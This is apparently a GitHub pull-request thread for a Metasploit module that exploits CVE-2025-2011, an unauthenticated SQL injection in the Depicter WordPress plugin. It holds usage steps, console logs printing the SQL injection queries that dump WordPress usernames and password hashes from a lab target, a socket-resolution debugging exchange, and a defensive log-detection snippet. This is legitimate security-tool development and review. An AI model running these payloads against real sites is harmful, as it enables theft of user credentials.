@Chocapikk Chocapikk commented May 14, 2025

Hello Metasploit Team,

This PR implements a new auxiliary scanner module scanner/http/wp_depicter_sqli_cve_2025_2011 for CVE-2025-2011, an UNAUTHENTICATED SQL injection in the Slider & Popup Builder by Depicter plugin (≤ 3.6.1).

The module automates:

  1. Database enumeration via a UNION-based payload on admin-ajax.php?s=
  2. Table enumeration to infer the WordPress table prefix
  3. User credential extraction (user_login:user_pass) from the inferred *_users table
  4. Credential creation, loot storage (wordpress.users), and reporting

Verification

  • Start msfconsole
  • use auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011
  • set RHOSTS <target_ip>
  • set RPORT <http_port>
  • set TARGETURI /
  • set COUNT 1
  • Run the module
    • ✔️ Should display:
      • Database name (e.g. exploit_market)
      • Tables list and inferred prefix (e.g. wp_users)
      • User credentials in a formatted table
      • Loot saved under wordpress.users
  • Verify credentials are created in the database (if connected)
  • Verify no side effects on the plugin or site functionality

@dledda-r7 dledda-r7 self-assigned this May 20, 2025
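
For defenders, the steps listed in the PR description leave recognisable traces in web server logs. The following is an added example, not code from the PR or from Metasploit: a log triage heuristic that flags requests to `admin-ajax.php` whose `s` parameter carries SQL fragments like those in the module output on this page. The combined log format, the sample lines, the `action=example` placeholder and all function names are assumptions.

```ruby
require 'uri'

# Constructed access-log lines for illustration; not captured traffic.
# "action=example" is a placeholder, not the plugin's real action name.
SAMPLE_LOG = <<~'LOG'
  203.0.113.7 - - [21/May/2025:18:28:30 +0000] "GET /wp-admin/admin-ajax.php?action=example&s=slider HTTP/1.1" 200 512
  203.0.113.9 - - [21/May/2025:18:28:31 +0000] "GET /wp-admin/admin-ajax.php?action=example&s=UNION+SELECT+0x63494a4b HTTP/1.1" 200 734
  203.0.113.9 - - [21/May/2025:18:28:32 +0000] "GET /wp-admin/admin-ajax.php?action=example&s=UNION+SELECT+12+FROM+information_schema.tables+WHERE+table_name%3D0x77705f7573657273 HTTP/1.1" 200 741
  198.51.100.4 - - [21/May/2025:18:29:02 +0000] "GET /index.php?s=union+select+tickets HTTP/1.1" 200 9001
LOG

# Heuristic markers: each one is weak alone, so the result lists every hit.
SQLI_HINTS = {
  union_select: /\bunion\b.{0,40}?\bselect\b/i,
  info_schema:  /\binformation_schema\b/i,
  hex_literal:  /\b0x(?:\h\h){2,}\b/i,            # hex-encoded string literal
  concat_dump:  /\b(?:group_concat|concat_ws)\s*\(/i
}.freeze

REQUEST_RE = /\A(?<client>\S+) .*?"(?:GET|POST) (?<target>\S+) HTTP\/[\d.]+"/

# Returns the URL-decoded `s` parameter, but only for admin-ajax.php requests.
def search_param(target)
  path, query = target.split('?', 2)
  return nil unless path.end_with?('/wp-admin/admin-ajax.php')

  pair = URI.decode_www_form(query.to_s).assoc('s')
  pair && pair.last
rescue ArgumentError # non-ASCII request target: not decodable, skip it
  nil
end

# Returns one record per log line whose `s` value matches at least one marker.
def suspicious_requests(log)
  log.each_line.filter_map do |line|
    m = REQUEST_RE.match(line)
    next unless m

    s = search_param(m[:target])
    next unless s

    hits = SQLI_HINTS.select { |_name, re| s.match?(re) }.keys
    next if hits.empty?

    { client: m[:client], s: s, hits: hits }
  end
end

suspicious_requests(SAMPLE_LOG).each { |r| puts r.inspect } if $PROGRAM_NAME == __FILE__
```

Only parameters visible in the request line are inspected; requests that send `s` in a POST body do not appear in a standard access log and need WAF or application-level logging.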
@Chocapikk

Hello @dledda-r7,

I’m running into an odd issue with the auxiliary module:

Working
When I use exploit, everything behaves as expected:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'cIJK')
[*] {SQLi} Encoded to (select 0x63494a4b)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 12 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 12 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(euCJqzGY) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) euCJqzGY from wp_users limit 1) zSl)
[*] {SQLi} Encoded to (select group_concat(euCJqzGY) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x7,0)),ifnull(user_pass,repeat(0x7b,0))) as binary) euCJqzGY from wp_users limit 1) zSl)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'chocapikk' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========

    user_login  user_pass
    ----------  ---------
    chocapikk   $wp$2y$10$rc5oXfNPG.bYSnbYvELKZeGgoQ9.QHcAXG8U/xunfXzsviMQkiPga

[+] Loot saved to: /home/chocapikk/.msf4/loot/20250521182831_default_127.0.0.1_wordpress.users_873419.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Failing
But when I try run http://lab:5555, it immediately errors out:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://lab:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'OEFldU')
[*] {SQLi} Encoded to (select 0x4f45466c6455)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in 'Rex::Socket.rex_resolve_hostname'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in 'Rex::Socket.rex_getaddrinfo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in 'Rex::Socket.getaddresses'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in 'Rex::Socket.getaddress'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in 'Rex::Socket.resolv_nbo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in 'Rex::Socket.resolv_nbo_i'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in 'Rex::Socket::SwitchBoard#best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in 'Rex::Socket::SwitchBoard.best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in 'Rex::Socket::Parameters#comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in 'Rex::Socket.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in 'Rex::Socket::Tcp.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in 'Rex::Socket::Tcp.create'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:177:in 'Rex::Proto::Http::Client#connect'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:262:in 'Rex::Proto::Http::Client#send_request'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:240:in 'Rex::Proto::Http::Client#_send_recv'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:214:in 'Rex::Proto::Http::Client#send_recv'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:381:in 'Msf::Exploit::Remote::HttpClient#send_request_raw'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:423:in 'Msf::Exploit::Remote::HttpClient#send_request_cgi'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in 'block in Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#get_sqli_object'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:58:in 'Msf::Exploit::SQLi::Common#raw_run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:69:in 'Msf::Exploit::SQLi::Common#run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in 'Msf::Exploit::SQLi::MySQLi::Common#test_vulnerable'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in 'Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:44:in 'Msf::Exploit::Remote::AutoCheck#with_prepended_auto_check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:20:in 'Msf::Exploit::Remote::AutoCheck#run'
[*] Auxiliary module execution completed

Do you have any insight into why this is happening? Thanks!

dledda-r7 commented May 22, 2025

Looks like an unrelated issue. I have dug a bit and I think we are passing the whole RHOSTS to the name resolver, which doesn't look correct. Adding @zeroSteiner for visibility, as he is currently working on rex-socket.

[1] pry(#<Rex::Proto::Http::Client>)> exit

From: /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:979 Rex::Socket.rex_resolve_hostname:

    974:
    975:   # @param name [String] The hostname to lookup via the resolver
    976:   # @param resolver [Rex::Proto::DNS::CachedResolver] Resolver to query for the name
    977:   # @return [Array] Array of Dnsruby::Message responses for consumers to reformat
    978:   def self.rex_resolve_hostname(name, resolver: @@resolver)
 => 979:     binding.pry
    980:     raise ::SocketError.new(
    981:       "Rex::Socket internal DNS resolution requires passing/setting a resolver"
    982:     ) unless resolver
    983:     raise ::SocketError.new(
    984:       "Rex::Socket internal DNS resolution requires passing a String name to resolve"

[1] pry(Rex::Socket)> name
=> "http://127.0.0.1:5555"
[2] pry(Rex::Socket)>

Additional context: this seems to be a problem related to this module, but not to all auxiliary modules.

msf6 auxiliary(scanner/http/title) > run http://localhost:5555/
[+] [127.0.0.1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 1 of 2 hosts (50% complete)
[+] [::1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) > run RHOSTS=http://localhost:5555/
[+] [127.0.0.1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 1 of 2 hosts (50% complete)
[+] [::1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) > use depicter

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_depicter_sqli_cve_2025_2011  2025-05-08       normal  No     WordPress Depicter Plugin SQL Injection (CVE-2025-2011)


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_depicter_sqli_cve_2025_2011

[*] Using auxiliary/gather/wp_depicter_sqli_cve_2025_2011
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://localhost:5555/
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'CTU7Crn3')
[*] {SQLi} Encoded to (select 0x4354553743726e33)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in `rex_resolve_hostname'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in `rex_getaddrinfo'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in `getaddresses'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in `getaddress'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in `resolv_nbo'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in `resolv_nbo_i'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in `best_comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in `best_comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in `comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in `create_param'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in `create_param'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in `create'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:177:in `connect'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:262:in `send_request'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:240:in `_send_recv'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:214:in `send_recv'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:381:in `send_request_raw'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:423:in `send_request_cgi'
[-]   /home/kali/Documents/github/metasploit-framework/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in `block in get_sqli_object'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/common.rb:58:in `raw_run_sql'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/common.rb:69:in `run_sql'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in `test_vulnerable'
[-]   /home/kali/Documents/github/metasploit-framework/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in `check'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:44:in `with_prepended_auto_check'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:20:in `run'
[*] Auxiliary module execution completed

@dledda-r7 dledda-r7 left a comment

Looks good

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://127.0.0.1:5555
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'I3pDUa69ad')
[*] {SQLi} Encoded to (select 0x49337044556136396164)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 6 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 6 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(KbVRV) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) KbVRV from wp_users limit 1) jgpkCCkA)
[*] {SQLi} Encoded to (select group_concat(KbVRV) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xc3,0)),ifnull(user_pass,repeat(0x80,0))) as binary) KbVRV from wp_users limit 1) jgpkCCkA)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'admin' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========

    user_login  user_pass
    ----------  ---------
    admin       $wp$2y$10$M8h2oj7BOKVXdKQMqYADbO8p3amrEj2iwVk0oGXYaGOpx948QVls2

[+] Loot saved to: /home/kali/.msf4/loot/20250528120414_default_127.0.0.1_wordpress.users_787790.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) >

@dledda-r7 dledda-r7 merged commit 9b7e27e into rapid7:master May 28, 2025
31 of 32 checks passed
@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label May 30, 2025
@smcintyre-r7

Release Notes

This adds a module for exploiting CVE-2025-2011 which is an unauthenticated SQL injection vulnerability in the "Slider & Popup Builder" plugin versions <= 3.6.1.
